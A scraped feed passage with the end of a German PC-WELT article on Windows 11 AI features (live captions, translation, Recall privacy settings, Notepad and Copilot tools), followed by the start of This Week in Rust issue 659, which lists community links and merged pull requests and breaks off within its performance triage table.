<p>Über das Zahnrad im Untertitelfenster passen Sie Position, Schriftgröße und Farbe an. Sie verschieben den Textbereich an den oberen oder unteren Rand oder lassen ihn frei schweben. Auf Wunsch bezieht die Funktion auch das Mikrofon ein und verschriftlicht Ihre eigene Stimme, praktisch bei Diktaten oder Gesprächen vor Ort.</p>



<p>Ein Filter blendet Schimpfwörter aus. Mehrere Grenzen sollten Sie kennen. Das System erkennt nur menschliche Sprache, Liedtexte und Geräusche bleiben außen vor. Treffen Mikrofon- und Computerton zusammen, hat die Tonausgabe des Rechners Vorrang.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Die Übersetzung hängt an der Hardware</h2>



<p>Die Untertitel kann Windows auch übersetzen, doch dafür gelten engere Voraussetzungen. Nötig ist ein Copilot+ PC mit eigener KI-Einheit und mindestens Windows 11 in der Version 24H2. Auf solchen Geräten überträgt das System gesprochene Inhalte aus über 40 Sprachen ins Englische und aus 27 Sprachen ins vereinfachte Chinesisch, in Echtzeit und ohne Cloud.</p>



<p>Der praktische Nutzen hat enge Grenzen. Die Zielsprache lautet Englisch oder vereinfachtes Chinesisch. Ein fremdsprachiges Video holt das System ins Englische. Für eine deutsche Ausgabe greifen Sie zu anderen Mitteln, darunter die eigenen Untertitelfunktionen von YouTube oder Netflix oder eine Übersetzung im Browser. Auf Rechnern ohne Copilot+ Technik bleiben die Standarduntertitel verfügbar, die Übersetzung erfordert die neuere Hardware.</p>



<p>Microsoft hat auf der Entwicklerkonferenz Build 2026 angekündigt, die lokale Spracherkennung und Funktionen wie die Live-Untertitel künftig auch auf normalen Prozessoren und Grafikkarten laufen zu lassen. Die Bindung an spezielle KI-Chips lockert sich damit, Microsoft verteilt die Neuerungen schrittweise über kommende Updates. Wann genau welche Sprache und welches Gerät an der Reihe ist, hat Microsoft offengelassen.</p>



<h2 class="wp-block-heading toc">Recall durchsucht alte Bildschirminhalte</h2>



<p>Recall fertigt im Abstand weniger Sekunden Momentaufnahmen Ihres Bildschirms an, speichert sie verschlüsselt auf der Festplatte und macht sie durchsuchbar. Sie beschreiben mit eigenen Worten, was Sie gesehen haben, und das System liefert die passende Stelle zurück. Eine Webseite, ein Dokument oder eine App-Ansicht von gestern findet sich so wieder, auch ohne Dateinamen oder Verlauf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4fa2b557215"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/windows_recall_6.jpg?quality=50&amp;strip=all" alt="Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar." class="wp-image-2976485" width="934" height="582" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Die neue semantische Suche von Microsoft soll das Auffinden von Bildern vereinfachen, noch aber ist die Funktion nur in den Insider Builds von Windows 11 verfügbar.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Der Vorteil zeigt sich bei häufiger Rücksuche. Suchen Sie oft nach früher gesehenen Inhalten, sparen Sie sich das mühsame Durchklicken von Ordnern und Browserverlauf. Bei seltener Nutzung bleibt der Gewinn gering, die offenen Datenschutzfragen bestehen weiter. Recall hält fest, was auf dem Schirm erscheint, darunter private Nachrichten, Bankdaten oder Gesundheitsinformationen. Ein Filter für sensible Inhalte greift, arbeitet aber nicht lückenlos. Deshalb sperren einzelne Programme, darunter Signal und der Brave-Browser, ihre Inhalte gegen die Aufnahme.</p>



<p>Mehrere Hürden schützen Sie vorab. Recall läuft nur auf Copilot+ PCs, setzt die Anmeldung über Windows Hello voraus und bleibt nach der Einrichtung ausgeschaltet. Erst Ihre bewusste Zustimmung startet die Aufnahmen. Pro Quartal beanspruchen die Momentaufnahmen bis zu 25 Gigabyte Speicher. Einzelne Apps und Webseiten können ausgeschlossen werden, Aufnahmen pausieren oder löschen.</p>



<p>Zum Abschalten öffnen Sie “Einstellungen” -&gt; “Datenschutz und Sicherheit” -&gt; “Recall und Snapshots” und stellen die Option zum Speichern der Aufnahmen auf Aus. Vorhandene Aufnahmen entfernen Sie an gleicher Stelle. <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Eine ausführliche Schritt-für-Schritt-Anleitung zum Deaktivieren und zum Löschen der Screenshots steht bereit</a>. </p>



<p>Zur Prüfung per Programm steht das kostenlose <a href="https://www.dpbolvw.net/click-3275038-13645854?sid=rss&amp;url=https://www.ashampoo.com/de-de/stop-recall" target="_blank" rel="noreferrer noopener">Stop Recall von Ashampoo</a> bereit. Das Tool kontrolliert den zuständigen Registry-Wert und schaltet die Funktion per Klick ab. Hilfreich ist das auch nach Updates, denn ein Update kann die Einstellung zurücksetzen. <a href="https://support.microsoft.com/de-DE/Windows/Ai/Ai-Features/retrace-your-steps-with-recall" target="_blank" rel="noreferrer noopener">Microsoft beschreibt die Funktion</a> und ihre Kontrollmöglichkeiten ebenfalls im eigenen Support.</p>



<h2 class="wp-block-heading toc">Editor und Copilot erledigen kleine Aufgaben</h2>



<p>Auch der schlichte Editor von Windows kann inzwischen KI-Funktionen nutzen. Die Schreibtools aktivieren Sie über das Zahnrad oben rechts, indem Sie in den Einstellungen ganz nach unten scrollen und die entsprechende Option einschalten. Anschließend markieren Sie einen Text, klicken mit der rechten Maustaste und lassen ihn zusammenfassen oder mithilfe vorgegebener Optionen umformulieren. Wenn Ihnen die Funktion nicht gefällt, können Sie sie an gleicher Stelle jederzeit wieder deaktivieren.</p>



<p>Der Copilot-Assistent beantwortet Fragen, formuliert Texte um und steuert auf Zuruf sogar Systemeinstellungen wie Bluetooth, die Bildschirmhelligkeit oder den Dunkelmodus. Starten lässt er sich über die Copilot-Taste auf neueren Tastaturen oder per Tastenkombination <strong>Windows + C</strong>. Viele Funktionen laufen dabei über die Cloud und erfordern ein Microsoft-Konto. Eine neue Suchfunktion namens „Ask Copilot“ soll mittelfristig die klassische Windows-Suche in der Taskleiste ersetzen, bleibt jedoch optional und wird nicht automatisch aktiviert.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 659]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</guid>
<pubDate>Thu, 09 Jul 2026 07:08:34 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/07/maintainer-spotlight-gen-li-rami3l/">Maintainer spotlight: Gen Li (@rami3l)</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/06/unite-for-clippy/">Together for a healthier Clippy</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-75">The Embedded Rustacean Issue #75</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://www.copper-robotics.com/whats-new/copper-rs-v100">copper-rs v1.0.0</a>: the open source deterministic robotics OS is now stable.</li>
<li><a href="https://rayfish.xyz/blog/01-introducing-rayfish">Rayfish: Your own private network. No servers, no setup.</a></li>
<li><a href="https://plabayo.tech/blog/rama-0-3">rama v0.3.0 — network service framework ready to be used by the wider Rust community</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.9.0">kache 0.9.0: supply-chain hardening + read-only CI cache</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/07/04/meet-guardiandbs-new-postgresql-compatibility-layer/">GuardianDB - PostgreSQL and P2P/Local-First Together</a></li>
<li><a href="https://buildnectar.com/">Nectar: a Rust-like language that compiles your whole web app to WebAssembly</a></li>
<li><a href="https://thekeeper.io/blog/logdrain-log-template-mining-in-rust/">logdrain: Fast, Embeddable Log-Template Mining in Rust</a></li>
<li><a href="https://medium.com/@vbasky/packaging-the-worlds-video-in-pure-rust-ff1f6b884fec">sheathe: Packaging the World's Video in Pure Rust</a></li>
<li><a href="https://docs.wickra.org/Quickstart-Rust">wickra: streaming-first technical indicators</a></li>
<li><a href="https://github.com/TeamXcelerator/xcelerator-solver/releases/tag/v0.1.0">Xcelerator Solver v0.1.0 -- deterministic symbolic regression</a></li>
<li><a href="https://github.com/tkmsikd/dlt-tui/releases/tag/v1.1.0">dlt-tui 1.1.0 - a fast TUI viewer for automotive DLT (AUTOSAR Diagnostic Log and Trace) files</a></li>
<li><a href="https://github.com/shihuili1218/rssh/releases/tag/v0.2.11">RSSH v0.2.11 — terminal workflows, safer SSH key import, and observable AI ops</a></li>
<li><a href="https://blog.none.at/blog/2026/2026-07-06-k8s-scale-app-rs/">k8s-scale-app-rs: Scale or Restart a Kubernetes Deployment from a CronJob</a></li>
<li><a href="https://dev.to/sicklefire/m-vis-v050-rc1-update-11cp">M-vis v0.5.0-rc1 update</a></li>
<li><a href="https://ganeshsivakumar.substack.com/p/flaredb">FlareDB: An Apache Beam Native Streaming Database built in Rust</a></li>
<li><a href="https://holovskyi.github.io/blog/typed-mqtt-topics-for-rust/">mqtt-typed-client 0.2: a type-safe async MQTT client on rumqttc</a></li>
<li><a href="https://github.com/LeChatP/RootAsRole/releases/tag/v4.0.0">RootAsRole: v4.0.0 Major release, secure execution, new logo</a></li>
<li><a href="https://www.qt.io/blog/rust-ui-framework-via-bridging-technology">A Cross-Platform Rust UI Framework via Qt’s Bridging Technology</a></li>
<li><a href="https://rapha.land/jam-programming-language/">Jam Programming Language</a></li>
<li><a href="https://www.clever.cloud/blog/company/2026/07/01/sozu-2-1-0-udp-load-balancer-programmable-edge/">Sōzu 2.1.0: UDP load balancing for the programmable edge</a></li>
<li><a href="https://op3kay.dev/writing/b0nker">b0nker: a minimal container runtime written in Rust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=SGR5qBdwk30">Rust Berlin Meetup 25/06/2026 Livestream</a></li>
<li>[video] <a href="https://www.youtube.com/live/_LtgHxuysUo">How do you rewrite C/C++ projects to Rust? – JetBrains interview with Luca Palmieri, Mainmatter</a></li>
<li><a href="https://kerkour.com/rustcrypto-slow-simd-rust">Investigating why RustCrypto is slow: Deep dive into SIMD instructions and hardware acceleration</a></li>
<li><a href="https://parsa.wtf/cast/">bool as u32</a></li>
<li><a href="https://arxiv.org/html/2605.30106">A Rust-to-Lean Verification Pipeline with AI Provers: An Experience Report</a></li>
<li><a href="https://blog.dureuill.net/articles/wip/">Work In Progress Rust</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=Fk165jYfHpc">OpenAI just spent $600k on Rust</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e07-rising-academies/">Rising Academies with Dylan Brown - Rust in Production Podcast</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[series] <a href="https://aibodh.com/posts/bevy-tutorial-build-your-first-3d-editor-in-rust/">Bevy Tutorial: Build Your First 3D Editor - Create a 3D Space on an Infinite Grid</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-axum-basics-and-routing-by-building-a-url-shortener/">Learn Axum Basics and Routing by Building a URL Shortener</a></li>
<li>[series] <a href="https://plabayo.tech/blog/rama-101-1-https-clients-and-abstractions">Rama 101.1: HTTPS clients and layers of abstraction</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://seanborg.tech/tiny-blog/rust-week-ven-diagram/">Clickable euler diagram of all the Rust week talks</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/apis-saltans-core">apis-saltans</a>, a Zigbee implementation including a coordinator API.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1627">Richard Neumann</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>

<p>* <a href="https://github.com/name970/Protocol/issues/4">Protocol - Extend bit-exactness tests to f64 reconstruction targets</a>                                                                          <br>
* <a href="https://github.com/lenra-io/dofigen/issues/278">Dofigen - No image tag replacement flag for the generate command</a></p>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>598 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-30..2026-07-07">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156976">enable eager <code>param_env</code> norm in new solver</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156379">lint on <code>core::ffi::c_void</code> as a return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158577">polish some macro parsing code</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158604">resolve: no allocation in <code>resolve_ident_in(_local)_module_*</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158627">simplify option-iterator flattening in the compiler</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157857">stabilize <code>#[my_macro] mod foo;</code> (part of <code>proc_macro_hygiene</code>)</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158537">add <code>std::io::cursor::WriteThroughCursor</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157347">implement <code>Box::as_non_null()</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156737">implement <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/134021">implement <code>IntoIterator</code> for <code>[&amp;[mut]] Box&lt;[T; N], A&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158427">implement <code>ptr::{read,write}_unaligned</code> via <code>repr(packed)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158539">move <code>SizeHint</code> and <code>IoHandle</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158540">move <code>std::io::Seek</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158704">optimize <code>ArrayChunks::try_rfold</code> with <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158573">stabilize <code>feature(atomic_from_mut)</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17135"><code>bindeps</code>: register transitive artifact targets</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17167">avoid cloning parsed TOML manifest in <code>ManifestErrorContext</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17176">avoid extra clone of parsed TOML manifest</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17178">remove unneeded cloning when parsing package index</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17169">change HashMaps and HashSets in Cargo to use Fxhasher</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17174">do not pass lint rustflags when <code>--cap-lints=allow</code> is set</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17164">fixed <code>Compilation::deps_output</code> only taking the last dep</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17177">pre-allocate a few vectors</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16807">stabilize <code>build-dir</code> layout v2</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17180">use a set when checking visited workspace members</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158751">fix crash when trying to inline foreign item which cannot have attributes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158334">show use-site paths for unevaluated const array lengths</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17319"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with const parameters</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17360"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with type params</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17309"><code>missing_trait_methods</code>: MSRV/unstable awareness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17289"><code>vec_init_then_push</code>: don't lint pushes from a macro expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17346"><code>inline_modules</code>: ignore <code>cfg(test)</code> modules in test builds</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17345"><code>match_same_arms</code>: keep arm-level expectations working under an outer allow</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17341"><code>unnecessary_operation</code>: avoid bad <code>!</code> suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17351"><code>unnecessary_unwrap_unchecked</code>: don't trigger inside the <code>_unchecked</code> fn</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17348">add required parentheses when the <code>needless_bool</code> suggestion is an operand</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17353">fix ICE when resolving local in <code>unnecessary_unwrap_unchecked</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17311">fix <code>infinite_loop</code> false positive inside gen blocks</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17358">fix <code>manual_c_str_literals</code> suggestion when the trailing backslash is escaped</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17337">fix <code>strlen_on_c_strings</code> incorrect suggestion logic</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17323">fix <code>suspicious_operation_groupings</code> duplications</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16902">lint bit width</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17338">optimize <code>Msrv::meets</code> calls</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17273">bail out of unicode lint scans when the snippet is pure ASCII</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17224">skip the HIR parent walk in <code>is_in_test_function</code> when there are no test items</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17366">place generated impl block after the existing impl block</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17333">refactor <code>StringAdd</code> lint pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17334">refactor <code>suspicious_xor_used_as_pow</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17293">remove <code>lower_ty</code> in <code>uninhabited_reference</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17328">respect the configured MSRV in <code>manual_is_variant_and</code>'s <code>map() == Some(_)</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17332">rewrite <code>mut_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17329">rewrite <code>redundant_else</code> as a late pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17354">rewrite <code>tuple_array_conversions</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22595">SCIP: exclude leading/trailing trivia in definition ranges</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22708">SCIP: remove dead <code>inlay_hints</code> field</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22433"><code>feat(ide-diagnostics)</code>: add diagnostics for invalid union patterns (E0784)</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22704"><code>internal(query-group-macro)</code>: remove the arity test</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22668">add tree top method to Syntax node</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22665">add handler for E0627</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22231">supports multi arms for <code>replace_match_with_if_let</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22690">fix UB in <code>smol_str borsh_non_utf8</code> test cases</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/20362">fix generic param for <code>generate_default_from_enum_variant</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22703"><code>walkthrough_create_project</code> file not packaged</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22677">assertion failure on closure with unbound function</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22613">avoid panic in <code>convert_tuple_struct_to_named_struct</code> on nested pattern usage</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22649">configuration syntax for nvim-lsp</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22706">correct resolution to value when it shares the same name with type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22619">exclude impls on the error type from impl enumeration</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22705">fix crash on <code>extract_variable</code> when selecting unresolved macro call</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22715">fix crash on completion inside macros</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22673">fix handling of params of coroutine fns</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22675">handle more cases of cfgs in expr store lowering</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22488">no generate with default assoc item</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22674">panics in <code>unwrap_return_type</code>, <code>remove_underscore</code>, and <code>promote_local_to_const</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22711">hoist attribute qualifier segment collection</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22709">reduce parser joint-token allocation</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22676">project-model: don't pass metadata extra args to sysroot</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22679">project-model: introduce cargo.configPath</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22581">provide startup time to ready log point and associated benchmark</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week was dominated by wild swings in benchmarks of the new-solver, which is not enabled by default, yet.
Apart from that, we got a very few notable changes, only one unexpected speedup from a bugfix in rustdoc.</p>
<p>Triage done by <strong>@panstromek</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;end=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;absolute=false&amp;stat=instructions%3Au">7dc2c162..3659db0d</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.2%</td>
<td>[0.2%, 0.2%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>162.1%</td>
<td>[0.2%, 1116.3%]</td>
<td>20</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.4%</td>
<td>[-8.4%, -0.1%]</td>
<td>7</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-1.1%</td>
